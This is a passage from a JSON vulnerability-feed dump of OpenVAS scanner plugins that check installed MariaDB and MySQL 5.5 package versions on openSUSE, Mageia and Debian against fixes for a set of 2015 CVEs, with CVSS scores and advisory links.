script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"MariaDB was updated to 5.5.46 to fix security issues and bugs.\n\n The following vulnerabilities were fixed in the upstream release:\n\n CVE-2015-4802, CVE-2015-4807, CVE-2015-4815, CVE-2015-4826,\n CVE-2015-4830, CVE-2015-4836, CVE-2015-4858, CVE-2015-4861, CVE-2015-4870,\n CVE-2015-4913, CVE-2015-4792\n\n A list of upstream changes and release notes can be found at the linked references.\");\n\n script_xref(name:\"URL\", value:\"https://mariadb.com/kb/en/mariadb/mariadb-5546-release-notes/\");\n script_xref(name:\"URL\", value:\"https://mariadb.com/kb/en/mariadb/mariadb-5546-changelog/\");\n\n script_tag(name:\"affected\", value:\"Security on openSUSE 13.1\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_xref(name:\"openSUSE-SU\", value:\"2015:2246-1\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2015 Greenbone Networks GmbH\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse\", \"ssh/login/rpms\", re:\"ssh/login/release=openSUSE13\\.1\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"openSUSE13.1\") {\n if(!isnull(res = isrpmvuln(pkg:\"libmysqlclient-devel\", rpm:\"libmysqlclient-devel~5.5.46~13.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libmysqlclient18\", rpm:\"libmysqlclient18~5.5.46~13.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libmysqlclient18-debuginfo\", rpm:\"libmysqlclient18-debuginfo~5.5.46~13.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n 
}\n\n if(!isnull(res = isrpmvuln(pkg:\"libmysqlclient_r18\", rpm:\"libmysqlclient_r18~5.5.46~13.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libmysqld-devel\", rpm:\"libmysqld-devel~5.5.46~13.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libmysqld18\", rpm:\"libmysqld18~5.5.46~13.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libmysqld18-debuginfo\", rpm:\"libmysqld18-debuginfo~5.5.46~13.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"mariadb\", rpm:\"mariadb~5.5.46~13.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"mariadb-bench\", rpm:\"mariadb-bench~5.5.46~13.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"mariadb-bench-debuginfo\", rpm:\"mariadb-bench-debuginfo~5.5.46~13.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"mariadb-client\", rpm:\"mariadb-client~5.5.46~13.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"mariadb-client-debuginfo\", rpm:\"mariadb-client-debuginfo~5.5.46~13.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"mariadb-debuginfo\", rpm:\"mariadb-debuginfo~5.5.46~13.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"mariadb-debugsource\", rpm:\"mariadb-debugsource~5.5.46~13.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"mariadb-errormessages\", rpm:\"mariadb-errormessages~5.5.46~13.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"mariadb-test\", rpm:\"mariadb-test~5.5.46~13.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"mariadb-test-debuginfo\", rpm:\"mariadb-test-debuginfo~5.5.46~13.1\", rls:\"openSUSE13.1\"))) {\n 
report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"mariadb-tools\", rpm:\"mariadb-tools~5.5.46~13.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"mariadb-tools-debuginfo\", rpm:\"mariadb-tools-debuginfo~5.5.46~13.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libmysqlclient18-32bit\", rpm:\"libmysqlclient18-32bit~5.5.46~13.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libmysqlclient18-debuginfo-32bit\", rpm:\"libmysqlclient18-debuginfo-32bit~5.5.46~13.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libmysqlclient_r18-32bit\", rpm:\"libmysqlclient_r18-32bit~5.5.46~13.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if(__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 4.0, "vector": "AV:N/AC:L/Au:S/C:N/I:N/A:P"}}, {"lastseen": "2019-05-29T18:36:14", "bulletinFamily": "scanner", "cvelist": ["CVE-2015-4830", "CVE-2015-4913", "CVE-2015-4858", "CVE-2015-4802", "CVE-2015-4815", "CVE-2015-4792", "CVE-2015-4836", "CVE-2015-4861", "CVE-2015-4870", "CVE-2015-4826"], "description": "Mageia Linux Local Security Checks mgasa-2015-0445", "modified": "2018-09-28T00:00:00", "published": "2015-11-17T00:00:00", "id": "OPENVAS:1361412562310131134", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310131134", "type": "openvas", "title": "Mageia Linux Local Check: mgasa-2015-0445", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: mgasa-2015-0445.nasl 11692 2018-09-28 16:55:19Z cfischer $\n#\n# Mageia Linux security check\n#\n# Authors:\n# Eero Volotinen <eero.volotinen@solinor.com>\n#\n# Copyright:\n# Copyright (c) 2015 Eero Volotinen, http://www.solinor.com\n#\n# This program is free software; you can redistribute it and/or 
modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.131134\");\n script_version(\"$Revision: 11692 $\");\n script_tag(name:\"creation_date\", value:\"2015-11-17 11:00:02 +0200 (Tue, 17 Nov 2015)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-09-28 18:55:19 +0200 (Fri, 28 Sep 2018) $\");\n script_name(\"Mageia Linux Local Check: mgasa-2015-0445\");\n script_tag(name:\"insight\", value:\"This update provides the upstream 10.0.22 maintenance release and fixes various security issues.\");\n script_tag(name:\"solution\", value:\"Update the affected packages to the latest available version.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"URL\", value:\"https://advisories.mageia.org/MGASA-2015-0445.html\");\n script_cve_id(\"CVE-2015-4802\", \"CVE-2015-4815\", \"CVE-2015-4826\", \"CVE-2015-4830\", \"CVE-2015-4836\", \"CVE-2015-4858\", \"CVE-2015-4861\", \"CVE-2015-4870\", \"CVE-2015-4913\", \"CVE-2015-4792\");\n script_tag(name:\"cvss_base\", value:\"4.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:S/C:N/I:N/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/mageia_linux\", \"ssh/login/release\", 
re:\"ssh/login/release=MAGEIA5\");\n script_category(ACT_GATHER_INFO);\n script_tag(name:\"summary\", value:\"Mageia Linux Local Security Checks mgasa-2015-0445\");\n script_copyright(\"Eero Volotinen\");\n script_family(\"Mageia Linux Local Security Checks\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"MAGEIA5\")\n{\nif ((res = isrpmvuln(pkg:\"mariadb\", rpm:\"mariadb~10.0.22~1.mga5\", rls:\"MAGEIA5\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 4.0, "vector": "AV:N/AC:L/Au:S/C:N/I:N/A:P"}}, {"lastseen": "2017-07-24T12:53:47", "bulletinFamily": "scanner", "cvelist": ["CVE-2015-4830", "CVE-2015-4816", "CVE-2015-4913", "CVE-2015-4858", "CVE-2015-4802", "CVE-2015-4815", "CVE-2015-4879", "CVE-2015-4792", "CVE-2015-4819", "CVE-2015-4836", "CVE-2015-4861", "CVE-2015-4870", "CVE-2015-4826"], "description": "Several issues have been discovered\nin the MySQL database server. The vulnerabilities are addressed by upgrading\nMySQL to the new upstream version 5.5.46. 
Please see the MySQL 5.5 Release Notes\nand Oracle's Critical Patch Update advisory for further details:\n\nhttps://dev.mysql.com/doc/relnotes/mysql/5.5/en/news-5-5-45.html\nhttps://dev.mysql.com/doc/relnotes/mysql/5.5/en/news-5-5-46.html\nhttp://www.oracle.com/technetwork/topics/security/cpuoct2015-2367953.html", "modified": "2017-07-07T00:00:00", "published": "2015-10-24T00:00:00", "id": "OPENVAS:703377", "href": "http://plugins.openvas.org/nasl.php?oid=703377", "type": "openvas", "title": "Debian Security Advisory DSA 3377-1 (mysql-5.5 - security update)", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_3377.nasl 6609 2017-07-07 12:05:59Z cfischer $\n# Auto-generated from advisory DSA 3377-1 using nvtgen 1.0\n# Script version: 1.0\n#\n# Author:\n# Greenbone Networks\n#\n# Copyright:\n# Copyright (c) 2015 Greenbone Networks GmbH http://greenbone.net\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\n\nif(description)\n{\n script_id(703377);\n script_version(\"$Revision: 6609 $\");\n script_cve_id(\"CVE-2015-4792\", \"CVE-2015-4802\", \"CVE-2015-4815\", \"CVE-2015-4816\",\n \"CVE-2015-4819\", \"CVE-2015-4826\", \"CVE-2015-4830\", \"CVE-2015-4836\",\n \"CVE-2015-4858\", \"CVE-2015-4861\", \"CVE-2015-4870\", \"CVE-2015-4879\",\n \"CVE-2015-4913\");\n script_name(\"Debian Security Advisory DSA 3377-1 (mysql-5.5 - security update)\");\n script_tag(name: \"last_modification\", value: \"$Date: 2017-07-07 14:05:59 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name: \"creation_date\", value: \"2015-10-24 00:00:00 +0200 (Sat, 24 Oct 2015)\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name: \"solution_type\", value: \"VendorFix\");\n script_tag(name: \"qod_type\", value: \"package\");\n\n script_xref(name: \"URL\", value: \"http://www.debian.org/security/2015/dsa-3377.html\");\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2015 Greenbone Networks GmbH http://greenbone.net\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\");\n script_tag(name: \"affected\", value: \"mysql-5.5 on Debian Linux\");\n script_tag(name: \"insight\", value: \"MySQL is a fast, stable and true\nmulti-user, multi-threaded SQL database server.\");\n script_tag(name: \"solution\", value: \"For the oldstable distribution\n(wheezy), these problems have been fixed in version 5.5.46-0+deb7u1.\n\nFor the stable distribution (jessie), these problems have been fixed in\nversion 
5.5.46-0+deb8u1.\n\nWe recommend that you upgrade your mysql-5.5 packages.\");\n script_tag(name: \"summary\", value: \"Several issues have been discovered\nin the MySQL database server. The vulnerabilities are addressed by upgrading\nMySQL to the new upstream version 5.5.46. Please see the MySQL 5.5 Release Notes\nand Oracle's Critical Patch Update advisory for further details:\n\nhttps://dev.mysql.com/doc/relnotes/mysql/5.5/en/news-5-5-45.html\nhttps://dev.mysql.com/doc/relnotes/mysql/5.5/en/news-5-5-46.html\nhttp://www.oracle.com/technetwork/topics/security/cpuoct2015-2367953.html\");\n script_tag(name: \"vuldetect\", value: \"This check tests the installed software\nversion using the apt package manager.\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isdpkgvuln(pkg:\"libmysqlclient-dev\", ver:\"5.5.46-0+deb7u1\", rls_regex:\"DEB7.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libmysqlclient18:i386\", ver:\"5.5.46-0+deb7u1\", rls_regex:\"DEB7.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libmysqlclient18:amd64\", ver:\"5.5.46-0+deb7u1\", rls_regex:\"DEB7.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libmysqld-dev\", ver:\"5.5.46-0+deb7u1\", rls_regex:\"DEB7.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libmysqld-pic\", ver:\"5.5.46-0+deb7u1\", rls_regex:\"DEB7.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"mysql-client\", ver:\"5.5.46-0+deb7u1\", rls_regex:\"DEB7.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"mysql-client-5.5\", ver:\"5.5.46-0+deb7u1\", rls_regex:\"DEB7.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"mysql-common\", ver:\"5.5.46-0+deb7u1\", rls_regex:\"DEB7.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"mysql-server\", ver:\"5.5.46-0+deb7u1\", rls_regex:\"DEB7.[0-9]+\")) != 
NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"mysql-server-5.5\", ver:\"5.5.46-0+deb7u1\", rls_regex:\"DEB7.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"mysql-server-core-5.5\", ver:\"5.5.46-0+deb7u1\", rls_regex:\"DEB7.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"mysql-source-5.5\", ver:\"5.5.46-0+deb7u1\", rls_regex:\"DEB7.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"mysql-testsuite-5.5\", ver:\"5.5.46-0+deb7u1\", rls_regex:\"DEB7.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libmysqlclient-dev\", ver:\"5.5.46-0+deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libmysqlclient18:i386\", ver:\"5.5.46-0+deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libmysqlclient18:amd64\", ver:\"5.5.46-0+deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libmysqld-dev\", ver:\"5.5.46-0+deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libmysqld-pic\", ver:\"5.5.46-0+deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"mysql-client\", ver:\"5.5.46-0+deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"mysql-client-5.5\", ver:\"5.5.46-0+deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"mysql-common\", ver:\"5.5.46-0+deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"mysql-server\", ver:\"5.5.46-0+deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"mysql-server-5.5\", ver:\"5.5.46-0+deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"mysql-server-core-5.5\", ver:\"5.5.46-0+deb8u1\", rls_regex:\"DEB8.[0-9]+\")) 
!= NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"mysql-source-5.5\", ver:\"5.5.46-0+deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"mysql-testsuite\", ver:\"5.5.46-0+deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"mysql-testsuite-5.5\", ver:\"5.5.46-0+deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-05-29T18:36:11", "bulletinFamily": "scanner", "cvelist": ["CVE-2015-4830", "CVE-2015-4816", "CVE-2015-4913", "CVE-2015-4858", "CVE-2015-4802", "CVE-2015-4815", "CVE-2015-4879", "CVE-2015-4792", "CVE-2015-4819", "CVE-2015-4836", "CVE-2015-4861", "CVE-2015-4870", "CVE-2015-4826"], "description": "Several issues have been discovered\nin the MySQL database server. 
The vulnerabilities are addressed by upgrading\nMySQL to the new upstream version 5.5.46.", "modified": "2019-03-18T00:00:00", "published": "2015-10-24T00:00:00", "id": "OPENVAS:1361412562310703377", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310703377", "type": "openvas", "title": "Debian Security Advisory DSA 3377-1 (mysql-5.5 - security update)", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_3377.nasl 14278 2019-03-18 14:47:26Z cfischer $\n# Auto-generated from advisory DSA 3377-1 using nvtgen 1.0\n# Script version: 1.0\n#\n# Author:\n# Greenbone Networks\n#\n# Copyright:\n# Copyright (c) 2015 Greenbone Networks GmbH http://greenbone.net\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.703377\");\n script_version(\"$Revision: 14278 $\");\n script_cve_id(\"CVE-2015-4792\", \"CVE-2015-4802\", \"CVE-2015-4815\", \"CVE-2015-4816\",\n \"CVE-2015-4819\", \"CVE-2015-4826\", \"CVE-2015-4830\", \"CVE-2015-4836\",\n \"CVE-2015-4858\", \"CVE-2015-4861\", \"CVE-2015-4870\", \"CVE-2015-4879\",\n \"CVE-2015-4913\");\n script_name(\"Debian Security Advisory DSA 3377-1 (mysql-5.5 - security update)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-18 15:47:26 +0100 (Mon, 18 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2015-10-24 00:00:00 +0200 (Sat, 24 Oct 2015)\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n script_xref(name:\"URL\", value:\"http://www.debian.org/security/2015/dsa-3377.html\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2015 Greenbone Networks GmbH http://greenbone.net\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\", re:\"ssh/login/release=DEB(7|8)\");\n script_tag(name:\"affected\", value:\"mysql-5.5 on Debian Linux\");\n script_tag(name:\"solution\", value:\"For the oldstable distribution\n(wheezy), these problems have been fixed in version 5.5.46-0+deb7u1.\n\nFor the stable distribution (jessie), these problems have been fixed in\nversion 5.5.46-0+deb8u1.\n\nWe recommend that you upgrade your mysql-5.5 packages.\");\n 
script_tag(name:\"summary\", value:\"Several issues have been discovered\nin the MySQL database server. The vulnerabilities are addressed by upgrading\nMySQL to the new upstream version 5.5.46.\");\n script_tag(name:\"vuldetect\", value:\"This check tests the installed software\nversion using the apt package manager.\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif((res = isdpkgvuln(pkg:\"libmysqlclient-dev\", ver:\"5.5.46-0+deb7u1\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libmysqlclient18:i386\", ver:\"5.5.46-0+deb7u1\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libmysqlclient18:amd64\", ver:\"5.5.46-0+deb7u1\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libmysqld-dev\", ver:\"5.5.46-0+deb7u1\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libmysqld-pic\", ver:\"5.5.46-0+deb7u1\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"mysql-client\", ver:\"5.5.46-0+deb7u1\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"mysql-client-5.5\", ver:\"5.5.46-0+deb7u1\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"mysql-common\", ver:\"5.5.46-0+deb7u1\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"mysql-server\", ver:\"5.5.46-0+deb7u1\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"mysql-server-5.5\", ver:\"5.5.46-0+deb7u1\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"mysql-server-core-5.5\", ver:\"5.5.46-0+deb7u1\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"mysql-source-5.5\", ver:\"5.5.46-0+deb7u1\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"mysql-testsuite-5.5\", ver:\"5.5.46-0+deb7u1\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = 
isdpkgvuln(pkg:\"libmysqlclient-dev\", ver:\"5.5.46-0+deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libmysqlclient18:i386\", ver:\"5.5.46-0+deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libmysqlclient18:amd64\", ver:\"5.5.46-0+deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libmysqld-dev\", ver:\"5.5.46-0+deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libmysqld-pic\", ver:\"5.5.46-0+deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"mysql-client\", ver:\"5.5.46-0+deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"mysql-client-5.5\", ver:\"5.5.46-0+deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"mysql-common\", ver:\"5.5.46-0+deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"mysql-server\", ver:\"5.5.46-0+deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"mysql-server-5.5\", ver:\"5.5.46-0+deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"mysql-server-core-5.5\", ver:\"5.5.46-0+deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"mysql-source-5.5\", ver:\"5.5.46-0+deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"mysql-testsuite\", ver:\"5.5.46-0+deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"mysql-testsuite-5.5\", ver:\"5.5.46-0+deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99);\n}", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:36:53", "bulletinFamily": "scanner", "cvelist": ["CVE-2015-4895", "CVE-2015-4830", "CVE-2015-4816", "CVE-2015-4913", "CVE-2015-4858", 
"CVE-2015-4802", "CVE-2015-4815", "CVE-2015-4879", "CVE-2015-4792", "CVE-2015-4819", "CVE-2015-4836", "CVE-2015-4861", "CVE-2015-4870", "CVE-2015-4826"], "description": "Several issues have been discovered in\nthe MariaDB database server. The vulnerabilities are addressed by upgrading\nMariaDB to the new upstream version 10.0.22.", "modified": "2019-03-18T00:00:00", "published": "2015-10-31T00:00:00", "id": "OPENVAS:1361412562310703385", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310703385", "type": "openvas", "title": "Debian Security Advisory DSA 3385-1 (mariadb-10.0 - security update)", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_3385.nasl 14275 2019-03-18 14:39:45Z cfischer $\n# Auto-generated from advisory DSA 3385-1 using nvtgen 1.0\n# Script version: 1.0\n#\n# Author:\n# Greenbone Networks\n#\n# Copyright:\n# Copyright (c) 2015 Greenbone Networks GmbH http://greenbone.net\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
